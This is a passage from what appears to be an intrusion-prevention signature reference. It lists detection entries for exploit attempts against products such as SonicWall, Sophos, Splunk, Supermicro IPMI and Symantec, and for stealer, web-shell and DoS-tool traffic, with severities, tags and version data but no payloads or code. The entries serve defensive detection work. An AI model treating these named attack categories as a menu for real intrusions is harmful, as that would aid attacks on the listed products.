Last changed: sgpkg-ips-1617-5242
Vulnerability: SonicWall-Gms-And-Analytics-Performdownloadtask-Directory-Traversal
Description:
Back to top

HTTP_CRL-SonicWall-Multiple-Products-Authentication-Bypass

About this situation: An attempt to exploit a vulnerability in SonicWall Analyzer detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, SonicWall Analyzer, SonicWall GMS, SonicWall UMA EM5000, SonicWall ViewPoint, CVE2013, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-548-5211
Last changed: sgpkg-ips-1730-5242
Vulnerability: SonicWall-Multiple-Products-Authentication-Bypass
Description:
Back to top

HTTP_CRL-SonicWall-SMA100-SQL-Injection

About this situation: An attempt to exploit a vulnerability in SonicWall SMA100 detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, SonicWall, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1408-5242
Last changed: sgpkg-ips-1408-5242
Vulnerability: SonicWall-SMA100-SQL-Injection
Description:
Back to top

HTTP_CRL-Sophos-Firewall-Authentication-Bypass-CVE-2022-1040

About this situation: An attempt to exploit a vulnerability in Sophos Firewall detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Sophos Firewall, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1478-5242
Last changed: sgpkg-ips-1502-5242
Vulnerability: Sophos-Firewall-Authentication-Bypass-CVE-2022-1040
Description:
Back to top

HTTP_CRL-Sophos-Web-Appliance-Change_password-Admin-Password-Privilege-Escalation

About this situation: An attempt to exploit a vulnerability in Sophos Web Appliance detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Sophos Web Appliance, CVE2014, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-578-5211
Last changed: sgpkg-ips-1776-5242
Vulnerability: Sophos-Web-Appliance-Change_password-Admin-Password-Privilege-Escalation
Description:
Back to top

HTTP_CRL-Sophos-Web-Appliance-Command-Injection-CVE-2023-1671

About this situation: An attempt to exploit a vulnerability in Sophos Web Appliance detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Sophos Web Appliance, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1672-5242
Last changed: sgpkg-ips-1672-5242
Vulnerability: Sophos-Web-Appliance-Command-Injection-CVE-2023-1671
Description:
Back to top

HTTP_CRL-Sophos-Web-Appliance-Sophosconfig-Write-Command-Execution

About this situation: An attempt to exploit a vulnerability in Sophos Web Appliance detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Sophos Web Appliance, CVE2014, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-579-5211
Last changed: sgpkg-ips-926-5242
Vulnerability: Sophos-Web-Appliance-Sophosconfig-Write-Command-Execution
Description:
Back to top

HTTP_CRL-Sophos-XG-Firewall-Pre-Auth-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Sophos XG Firewall detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Sophos XG Firewall, Any Hardware, CVE2020, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1406-5242
Last changed: sgpkg-ips-1406-5242
Vulnerability: Sophos-XG-Firewall-Pre-Auth-SQL-Injection
Description:
Back to top

HTTP_CRL-SpamTitan-Unauthenticated-RCE

About this situation: An attempt to exploit a vulnerability in SpamTitan detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, SpamTitan, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1341-5242
Last changed: sgpkg-ips-1341-5242
Vulnerability: SpamTitan-Unauthenticated-RCE
Description:
Back to top

HTTP_CRL-SPIP-Form-PHP-Injection

About this situation: An attempt to exploit a vulnerability in SPIP detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, SPIP, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1657-5242
Last changed: sgpkg-ips-1657-5242
Vulnerability: SPIP-Form-PHP-Injection
Description:
Back to top

HTTP_CRL-Splunk-Edit_User-Capability-Privilege-Escalation

About this situation: An attempt to exploit a vulnerability in Splunk detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Linux, Any Hardware, Splunk, CVE2023, Windows not specific, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1659-5242
Last changed: sgpkg-ips-1659-5242
Vulnerability: Splunk-Edit_User-Capability-Privilege-Escalation
Description:
Back to top

HTTP_CRL-Splunk-Enterprise-Alerts_Id-Server-Side-Request-Forgery

About this situation: An attempt to exploit a vulnerability in Splunk Enterprise detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Splunk, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-900-5242
Last changed: sgpkg-ips-900-5242
Vulnerability: Splunk-Enterprise-Alerts_Id-Server-Side-Request-Forgery
Description:
Back to top

HTTP_CRL-Splunk-Enterprise-Data-Model-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Splunk Enterprise detected.
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Linux, Any Hardware, Splunk, CVE2022, Windows not specific, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1533-5242
Last changed: sgpkg-ips-1533-5242
Vulnerability: Splunk-Enterprise-Data-Model-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Splunk-Enterprise-Module_Resolver-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Splunk Enterprise detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Splunk, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1753-5242
Last changed: sgpkg-ips-1753-5242
Vulnerability: Splunk-Enterprise-Module_Resolver-Directory-Traversal
Description:
Back to top

HTTP_CRL-Splunk-Enterprise-Radio-Reflected-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Splunk detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Splunk, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1535-5242
Last changed: sgpkg-ips-1535-5242
Vulnerability: Splunk-Enterprise-Radio-Reflected-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Splunk-Enterprise-Splunk-App-For-Lookup-File-Editing-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Splunk App for Lookup File Editing detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Splunk, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1604-5242
Last changed: sgpkg-ips-1604-5242
Vulnerability: Splunk-Enterprise-Splunk-App-For-Lookup-File-Editing-Directory-Traversal
Description:
Back to top

HTTP_CRL-Splunk-Search-Remote-Code-Execution

About this situation: An attempt to exploit a Splunk Search Remote Code Execution vulnerability detected.
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Splunk, CVE2011, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-712-5211
Last changed: sgpkg-ips-712-5211
Vulnerability: Splunk-Search-Remote-Code-Execution
Description:
Back to top

HTTP_CRL-Spring-Core-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Spring Core detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Spring Core, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1449-5242
Last changed: sgpkg-ips-1730-5242
Vulnerability: Spring-Core-Remote-Code-Execution
Description:
Back to top

HTTP_CRL-Spring-Core-Remote-Code-Execution-Suspicious-Parameter-Name

About this situation: An attempt to exploit a vulnerability in Spring Core detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Spring Core, CVE2022, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1452-5242
Last changed: sgpkg-ips-1613-5242
Vulnerability: Spring-Core-Remote-Code-Execution
Description:
Back to top

HTTP_CRL-SProtector.A-Traffic

About this situation: A suspicious traffic pattern detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-694-5211
Last changed: sgpkg-ips-694-5211
Vulnerability: Win32.Adware.SProtector.A-Botnet
Description:
Back to top

HTTP_CRL-SQL-Drop-Table

About this situation: An attempt to exploit an SQL injection vulnerability
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-853-5242
Last changed: sgpkg-ips-853-5242
Description:
Back to top

HTTP_CRL-SQL-Union-Select

About this situation: SQL commands detected in URI
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-344-4219
Last changed: sgpkg-ips-1383-5242
Vulnerability: SQL-Injection
Description:
Back to top

HTTP_CRL-Sqlninja-Attack-Tool-Usage

About this situation: Detects SQL queries used by the Sqlninja attack tool
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft SQL Server, Any Operating System not specific, Microsoft SQL Server not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-122-2032
Last changed: sgpkg-ips-1637-5242
Vulnerability: Sqlninja-Attack-Tool-Usage
Description:
Back to top

HTTP_CRL-Stagil-Navigation-For-JIRA-Path-Traversal-Vulnerabilities

About this situation: An attempt to exploit a vulnerability in Stagil Navigation for Jira detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Stagil Navigation for Jira, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1650-5242
Last changed: sgpkg-ips-1774-5242
Vulnerability: Stagil-Navigation-For-JIRA-Path-Traversal-Vulnerabilities
Description:
Back to top

HTTP_CRL-Stalkerlab-Mailers-CGIMail-Access

About this situation: Access to Stalkerlab Mailers CGIMail.exe
Context: HTTP Normalized Request-Line
Severity: 2
Tags: Windows, Any Hardware, Stalkerlab Mailers, CVE2000, Windows not specific, Potential Disclosure, TCP Client Traffic
First detected in: sgpkg-ips-3-1102
Last changed: sgpkg-ips-514-5211
Vulnerability: HTTP-Stalkerlab-Mailers-File-Disclosure
Description:
Back to top

HTTP_CRL-Stealc-Stealer-Infection-Traffic

About this situation: Stealc infection traffic detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1560-5242
Last changed: sgpkg-ips-1560-5242
Vulnerability: Stealc-Stealer-Infection-Traffic
Description:
Back to top

HTTP_CRL-Stealer.a-Traffic

About this situation: A suspicious traffic pattern detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Android, Any Hardware, Botnet, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-693-5211
Last changed: sgpkg-ips-693-5211
Vulnerability: Android.Trojan.Stealer-Botnet
Description:
Back to top

HTTP_CRL-Studio-42-elFinder-Elfindervolumedriver-Command-Injection

About this situation: An attempt to exploit a vulnerability in Studio-42 elFinder detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, elFinder, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1391-5242
Last changed: sgpkg-ips-1391-5242
Vulnerability: Studio-42-elFinder-Elfindervolumedriver-Command-Injection
Description:
Back to top

HTTP_CRL-Studio-42-elFinder-Getfullpath-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Studio-42 elFinder detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, elFinder, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1453-5242
Last changed: sgpkg-ips-1453-5242
Vulnerability: Studio-42-elFinder-Getfullpath-Directory-Traversal
Description:
Back to top

HTTP_CRL-Subdreamer-Light-Global-Variables-SQL-Injection

About this situation: SQL injection vulnerability in Subdreamer Light
Context: HTTP Normalized Request-Line
Severity: 2
Tags: Any Operating System, Any Hardware, Subdreamer Light, CVE2005, Any Operating System not specific, Potential Disclosure, TCP Client Traffic
First detected in: sgpkg-ips-24-1210
Last changed: sgpkg-ips-1622-5242
Vulnerability: HTTP-Subdreamer-Light-Global-Variables-SQL-Injection
Description:
Back to top

HTTP_CRL-SugarCRM-Rest_Data-PHP-Object-Deserialization

About this situation: An attempt to exploit a vulnerability in SugarCRM detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, SugarCRM, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-809-5242
Last changed: sgpkg-ips-1013-5242
Vulnerability: SugarCRM-Rest_Data-PHP-Object-Deserialization
Description:
Back to top

HTTP_CRL-Sumavision-EMR-Arbitrary-User-Creation-CVE-2020-10181

About this situation: An attempt to exploit a vulnerability in Sumavision EMR detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Sumavision, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1403-5242
Last changed: sgpkg-ips-1403-5242
Vulnerability: Sumavision-EMR-Arbitrary-User-Creation-CVE-2020-10181
Description:
Back to top

HTTP_CRL-SunBurst-SUPERNOVA-Traffic-Detected-1

About this situation: Request parameters associated with the SunBurst SUPERNOVA web shell detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, SolarWinds Orion, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1308-5242
Last changed: sgpkg-ips-1308-5242
Vulnerability: Solarwinds-SunBurst-Traffic
Description:
Back to top

HTTP_CRL-Sunhillo-Sureline-Command-Injection-CVE-2021-36380

About this situation: An attempt to exploit a vulnerability in Sunhillo SureLine detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, SureLine, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1641-5242
Last changed: sgpkg-ips-1822-5242
Vulnerability: Sunhillo-Sureline-Command-Injection-CVE-2021-36380
Description:
Back to top

HTTP_CRL-Supermicro-Onboard-IPMI-Close-Window-Cgi-Buffer-Overflow

About this situation: Supermicro Onboard IPMI close window cgi Buffer Overflow
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Linux, Any Hardware, Supermicro Onboard IPMI, CVE2013, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-574-5211
Last changed: sgpkg-ips-926-5242
Vulnerability: Supermicro-Onboard-IPMI-Close-Window-Cgi-Buffer-Overflow
Description:
Back to top

HTTP_CRL-Supermicro-Onboard-IPMI-login.cgi-Multiple-Buffer-Overflows

About this situation: An attempt to exploit a vulnerability Supermicro Onboard IPMI detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Linux, Any Hardware, Supermicro Onboard IPMI, CVE2013, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-597-5211
Last changed: sgpkg-ips-1060-5242
Vulnerability: Supermicro-Onboard-IPMI-login.cgi-Multiple-Buffer-Overflows
Description:
Back to top

HTTP_CRL-Supermicro-Onboard-IPMI-logout.cgi-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability Supermicro Onboard IPMI detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Linux, Any Hardware, Supermicro Onboard IPMI, CVE2013, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-597-5211
Last changed: sgpkg-ips-926-5242
Vulnerability: Supermicro-Onboard-IPMI-logout.cgi-Buffer-Overflow
Description:
Back to top

HTTP_CRL-Supermicro-Onboard-IPMI-url_redirect.cgi-Directory-Traversal

About this situation: An attempt to exploit a vulnerability Supermicro Onboard IPMI detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Linux, Any Hardware, Supermicro Onboard IPMI, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-597-5211
Last changed: sgpkg-ips-926-5242
Vulnerability: Supermicro-Onboard-IPMI-url_redirect.cgi-Directory-Traversal
Description:
Back to top

HTTP_CRL-Supervisor-XML-RPC-Authenticated-Remote-Code-Execution

About this situation: A Supervisor XML-RPC Authenticated Remote Code Execution vulnerability
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Unix, Linux, Mac OS X, Any Hardware, Supervisor, CVE2017, Unix not specific, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1020-5242
Last changed: sgpkg-ips-1378-5242
Vulnerability: Supervisor-XML-RPC-Authenticated-Remote-Code-Execution
Description:
Back to top

HTTP_CRL-Suprema-Biostar-2-SQL-Injection-CVE-2023-27167

About this situation: An attempt to exploit a vulnerability in Suprema BioStar 2 detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Suprema BioStar 2, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1657-5242
Last changed: sgpkg-ips-1657-5242
Vulnerability: Suprema-Biostar-2-SQL-Injection-CVE-2023-27167
Description:
Back to top

HTTP_CRL-Suspected-APT-Traffic-Pattern

About this situation: An HTTP request resembling APT traffic detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1007-5242
Last changed: sgpkg-ips-1706-5242
Vulnerability: Known-APT-Traffic
Description:
Back to top

HTTP_CRL-Suspected-LOIC-Request

About this situation: HTTP request possibly sent by LOIC tool detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Denial of Service, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-510-5211
Last changed: sgpkg-ips-510-5211
Vulnerability: LOIC-DoS-Tool
Description:
Back to top

HTTP_CRL-Suspicious-Parameter-Value

About this situation: Suspicious parameter value
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1695-5242
Last changed: sgpkg-ips-1834-5242
Description:
Back to top

HTTP_CRL-Symantec-Encryption-Management-Server-Database-Backup-Command-Injection

About this situation: An attempt to exploit a vulnerability in Symantec Encryption Management Server detected
Context: HTTP Client Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Symantec Encryption Management Server, CVE2014, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-630-5211
Last changed: sgpkg-ips-670-5211
Vulnerability: Symantec-Encryption-Management-Server-Database-Backup-Command-Injection
Description:
Back to top

HTTP_CRL-Symantec-Endpoint-Protection-Consoleservlet-Resetpassword-Policy-Bypass

About this situation: An attempt to exploit a vulnerability in Symantec Endpoint Protection detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Symantec Endpoint Protection, CVE2015, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-676-5211
Last changed: sgpkg-ips-676-5211
Vulnerability: Symantec-Endpoint-Protection-Consoleservlet-Resetpassword-Policy-Bypass
Description:
Back to top

HTTP_CRL-Symantec-Endpoint-Protection-Manager-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Symantec Endpoint Protection Manager detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, Symantec Endpoint Protection Manager, CVE2014, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-617-5211
Last changed: sgpkg-ips-666-5211
Vulnerability: Symantec-Endpoint-Protection-Manager-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Symantec-Endpoint-Protection-Manager-Cross-Site-Scripting-CVE-2016-3652

About this situation: An attempt to exploit a vulnerability in Symantec Endpoint Protection detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Symantec Endpoint Protection, CVE2016, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-780-5211
Last changed: sgpkg-ips-780-5211
Vulnerability: Symantec-Endpoint-Protection-Manager-Cross-Site-Scripting-CVE-2016-3652
Description:
Back to top

HTTP_CRL-Symantec-IM-Manager-Administrator-Console-Code-Injection

About this situation: An attempt to exploit a vulnerability in Symantec IM Manager detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Symantec IM Manager, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-419-4219
Last changed: sgpkg-ips-512-5211
Vulnerability: Symantec-IM-Manager-Administrator-Console-Code-Injection
Description:
Back to top

HTTP_CRL-Symantec-IM-Manager-Administrator-Interface-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Symantec IM Manager detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Symantec IM Manager, CVE2011, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-420-4219
Last changed: sgpkg-ips-1730-5242
Vulnerability: Symantec-IM-Manager-Administrator-Interface-SQL-Injection
Description:
Back to top

HTTP_CRL-Symantec-IM-Manager-IMAdminReportTrendFormRun.asp-SQL-Injection

About this situation: An attempt to exploit an SQL injection vulnerability in Symantec IM Manager detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Windows, Any Hardware, Symantec IM Manager, CVE2010, Windows not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-365-4219
Last changed: sgpkg-ips-1013-5242
Vulnerability: Symantec-IM-Manager-IMAdminReportTrendFormRun.asp-SQL-Injection
Description:
Back to top

HTTP_CRL-Symantec-IM-Manager-IMAdminScheduleReport.asp-SQL-Injection

About this situation: An attempt to exploit an SQL injection vulnerability in Symantec IM Manager detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Windows, Any Hardware, Symantec IM Manager, CVE2010, Windows not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-365-4219
Last changed: sgpkg-ips-1013-5242
Vulnerability: Symantec-IM-Manager-IMAdminScheduleReport.asp-SQL-Injection
Description:
Back to top

HTTP_CRL-Symantec-IM-Manager-LoggedInUsers.lgx-Definition-File-SQL-Injections

About this situation: An attempt to exploit an SQL injection vulnerability in Symantec IM Manager detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Windows, Any Hardware, Symantec IM Manager, CVE2010, Windows not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-365-4219
Last changed: sgpkg-ips-1013-5242
Vulnerability: Symantec-IM-Manager-LoggedInUsers.lgx-Definition-File-SQL-Injections
Description:
Back to top

HTTP_CRL-Symantec-IM-Manager-rdpageimlogic.aspx-SQL-Injections

About this situation: An attempt to exploit an SQL injection vulnerability in Symantec IM Manager detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Windows, Any Hardware, Symantec IM Manager, CVE2010, Windows not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-366-4219
Last changed: sgpkg-ips-1589-5242
Vulnerability: Symantec-IM-Manager-rdpageimlogic.aspx-SQL-Injections
Description:
Back to top

HTTP_CRL-Symantec-Liveupdate-Administrator-Security-Bypass

About this situation: An attempt to exploit a vulnerability in Symantec LiveUpdate Administrator detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Symantec LiveUpdate Administrator, CVE2014, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-577-5211
Last changed: sgpkg-ips-577-5211
Vulnerability: Symantec-Liveupdate-Administrator-Security-Bypass
Description:
Back to top

HTTP_CRL-Symantec-Messaging-Gateway-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Symantec Messaging Gateway detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Symantec Messaging Gateway, CVE2012, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-499-5211
Last changed: sgpkg-ips-499-5211
Vulnerability: Symantec-Messaging-Gateway-Directory-Traversal
Description:
Back to top

HTTP_CRL-Symantec-Messaging-Gateway-Performrestore-Command-Injection

About this situation: An attempt to exploit a vulnerability in Symantec Messaging Gateway detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Symantec Messaging Gateway, CVE2017, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-980-5242
Last changed: sgpkg-ips-980-5242
Vulnerability: Symantec-Messaging-Gateway-Performrestore-Command-Injection
Description:
Back to top

HTTP_CRL-Symantec-Messaging-Gateway-Remote-Code-Execution

About this situation: A Symantec Messaging Gateway Remote Code Execution vulnerability
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Linux, Any Hardware, Symantec Messaging Gateway, CVE2017, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1025-5242
Last changed: sgpkg-ips-1025-5242
Vulnerability: Symantec-Messaging-Gateway-Remote-Code-Execution
Description:
Back to top

HTTP_CRL-Symantec-Scan-Engine-Authentication-Bypass

About this situation: A Symantec Scan Engine Authentication Bypass vulnerability
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Symantec AntiVirus Scan Engine, CVE2006, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1000-5242
